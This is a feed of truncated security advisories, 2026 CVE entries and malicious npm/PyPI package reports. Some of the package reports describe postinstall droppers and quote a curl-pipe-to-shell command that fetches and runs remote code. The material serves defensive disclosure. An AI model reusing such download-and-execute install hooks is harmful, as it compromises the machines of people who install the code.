PT-2026-42249

Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicio...

Splunk Cloud Platform和Splunk Enterprise 输入验证错误漏洞

Splunk Cloud Platform and Splunk Enterprise are both products of the American company Splunk. Splunk Cloud Platform is a powerful service for data collection, processing, and analysis. Splunk Enterprise is a suite of software for data collection and analysis. There is an input validation...

ROS-20260520-73-0004

A vulnerability in the V8 JavaScript script handler of Google Chrome and Microsoft Edge browsers is related to improper code generation control. Exploitation of the vulnerability could allow an attacker acting remotely to execute arbitrary code using a specially crafted HTML page...

PT-2026-42213

Name of the Vulnerable Software and Affected Versions Splunk Enterprise versions prior to 10.2.2 Splunk Enterprise versions prior to 10.0.5 Splunk Enterprise versions prior to 9.4.11 Splunk Enterprise versions prior to 9.3.12 Splunk Cloud Platform versions prior to 10.4.2603.1 Splunk Cloud Platfo...

Linux Distros Unpatched Vulnerability : CVE-2026-40016

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Attacker can upload a malicious Sieve script over ManageSieve service or locally to bypass configured CPU time limits for Sieve up to 130 times of the configure...

MAL-2026-4693 Malicious code in to-cms (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cccb3d12c0df356fc34c0b79a003f32a6484dd9229b43dfef5b89c8dd4dec51c package.json declares postinstall: node index.js. On npm install, index.js unconditionally HTTPS-GETs https://meet-fr.com/ChromeSetup.exe, writes it ...

MAL-2026-4426 Malicious code in @riteshkumar04/stack-audit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 145196e93f9e6006134b35a8d5abfe7fa0de18f2d52b6712d8b2a5ec036526bc On npm install, scripts/install.js runs curl -sSL https://raw.githubusercontent.com/neutron420/StackAudit/main/scripts/install.sh | sh or the...

MAL-2026-4606 Malicious code in martinez-polygon-clipping-tony (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dabf04b2f99e28eb10740bd7459bf64513fac98a064b60071b1e7aabf8674dd0 Package name impersonates the legitimate martinez-polygon-clipping library: README, badges, and API surface are copied verbatim, while repository...

CVE-2026-34463

CVE-2026-34463 affects MantisBT prior to 2.28.2. When cloning an issue from a different project, the clone form (bug_report_page.php) prepends the source project name before the category selector without proper escaping, allowing stored HTML injection (XSS) if an attacker can set the project name...

CVE-2026-34234 CtrlPanel: Unauthenticated RCE using installer script

CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer public/installer/index.php is vulnerable to unauthenticated Remote Code Execution RCE because it performs the install.lock check only after including and executing form handler...

CVE-2026-45243

Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read,...

MAL-2026-4453 Malicious code in @tarojs/cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 59b4e6cd0fe6bd16c6fb2bd04e6542a2a3052182d8815a08b124df56f2d9fde2 On npm install, the package's postinstall script performs a reachability GET to https://taro.jd.com/ and, on success, invokes the package's own...

Malicious code in clsx-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 23e4e85f63d161234d84c774fdff696827934a27282be2ce9ff362a756246ee6 On npm install, dist/postinstall.js base64-decodes the URL https://api.npoint.io/984b75c022a70cf00c39, fetches JSON from this anonymous mutable...

EUVD-2026-30967

EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry...

MAL-2026-4441 Malicious code in @shadanai/openclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0e2f02ab1bb3d99de1787ed7d69f1df97bd3b2d7c18cc8ba4e5f8688f649ce9 On npm install, scripts/postinstall.mjs performs several installer-harm actions. 1 Backdoor: writes /.openclaw/openclaw.json configuring a local...

MAL-2026-4174 Malicious code in durabletask (PyPI)

1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window 16:19–16:54 UTC. Pin to =1.4.0. Attack chain - Stage 1 — Import-time dropper: on import, the package fetches a...

Cross-site Scripting (XSS)

Overview Affected versions of this package are vulnerable to Cross-site Scripting XSS via the navigateTo function when handling external redirects in server-side rendering. An attacker can execute arbitrary HTML or JavaScript in the application's origin by supplying a crafted URL containing...

CVE-2026-45303

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an...

firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters

A flaw was found in Mozilla. The Mozilla Foundation's Security Advisory describes the following issue: A crafted URL containing Arabic script and whitespace characters could have hidden the true origin of the page, resulting in a potential spoofing attack...

CVE-2026-45314

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the channel webhook create/update flow accepts arbitrary profileimageurl values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves...